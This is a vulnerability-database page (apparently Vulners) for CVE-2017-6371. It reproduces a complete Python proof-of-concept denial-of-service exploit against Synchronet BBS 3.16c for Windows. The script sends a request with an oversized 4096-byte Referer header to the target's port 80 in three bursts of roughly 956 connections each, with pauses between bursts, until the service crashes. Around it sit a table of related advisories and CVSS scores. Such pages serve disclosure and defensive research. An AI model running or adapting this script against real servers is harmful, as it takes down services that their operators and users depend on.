Vulners
Lucene search
Synchronet BBS 3.16c - Denial of Service
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Synchronet BBS 3.16c - Denial of Service Exploit | 1 Mar 201700:00 | – | zdt |
 | CVE-2017-6371 | 27 Feb 202007:58 | – | circl |
 | Synchronet BBS Denial of Service Vulnerability | 2 Mar 201700:00 | – | cnvd |
 | CVE-2017-6371 | 27 Feb 202004:14 | – | cve |
 | CVE-2017-6371 | 27 Feb 202004:14 | – | cvelist |
 | Synchronet BBS 3.16c - Denial of Service | 28 Feb 201700:00 | – | exploitpack |
 | CVE-2017-6371 | 27 Feb 202005:15 | – | nvd |
 | Synchronet BBS 3.16c For Windows Denial Of Service | 1 Mar 201700:00 | – | packetstorm |
 | Design/Logic Flaw | 27 Feb 202005:15 | – | prion |
# Exploit Title: Synchronet BBS 3.16c for Windows – Multiple vulnerabilities
# Date: 2017-02-28
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: ftp://synchro.net/Synchronet/sbbs316c.zip
# Version: 3.16c for Windows
# Tested on: Windows 7 Pro SP1 x64, Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6371
import socket
import time
import sys
try:
host = sys.argv[1]
port = 80
except IndexError:
print "[+] Usage %s <host> " % sys.argv[0]
sys.exit()
exploit = "\x41"*4096
buffer = "GET /index.ssjs HTTP/1.1\r\n"
buffer+= "Host: 192.168.198.129\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: "+exploit+"\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
i = 1
while i < 957:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
print("[*] Try: "+str(i))
s.send(buffer)
s.close()
i=i+1
except:
print("[-] The service seems to be down\r\n")
break
print("[i] Waiting a few seconds before starting a second attack.\r\n")
time.sleep(25)
print("[*] Second run to trigger the DoS")
i = 1
while i < 957:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
print("[*] Try: "+str(i))
s.send(buffer)
s.close()
i=i+1
except:
print("[-] The service seems to be down.\r\n")
break
print("[i] Wait before the final strike.\r\n")
time.sleep(25)
print("[*] Third run to trigger the DoS")
i = 1
while i < 957:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
print("[*] Try: "+str(i))
s.send(buffer)
s.close()
i=i+1
except:
print("[-] The service seems to be down.\r\n")
print("[!] It can take a few seconds for the service to crash\r\n")
breakData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Feb 2017 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.14714